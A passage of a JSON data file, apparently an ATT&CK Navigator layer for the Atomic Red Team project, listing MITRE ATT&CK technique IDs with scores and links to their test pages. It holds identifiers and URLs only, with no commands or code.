Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1090.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1091","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1095","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1106","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1112","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1119","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1120","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1123","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1125","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1133","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1187","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1197","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1202","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1207","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1219","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1220","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1221","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View 